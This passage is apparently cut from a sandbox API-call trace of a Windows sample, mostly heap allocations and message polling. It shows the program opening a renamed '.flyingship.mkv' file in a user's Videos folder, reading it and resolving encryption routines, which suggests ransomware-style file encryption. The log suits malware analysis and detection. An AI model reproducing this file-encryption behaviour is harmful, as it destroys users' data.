hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0192.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0192.686] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf")) returned 0x10 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0192.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\gwljrbpo46x9neds.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0192.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0192.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0192.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.690] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.690] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8fd6, lpOverlapped=0x0) returned 1 [0192.693] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8fd6) returned 0xbea018 [0192.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0192.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8fd6) returned 0xbf2ff8 [0192.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.695] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8fd6) returned 0xbea018 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.696] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.696] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.696] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0192.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8fd6) returned 0xbea018 [0192.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0192.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8fd6) returned 0xbfbfd8 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0192.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.699] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0192.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0192.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0192.699] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0192.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.699] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0192.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.700] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.700] RtlAllocateHeap 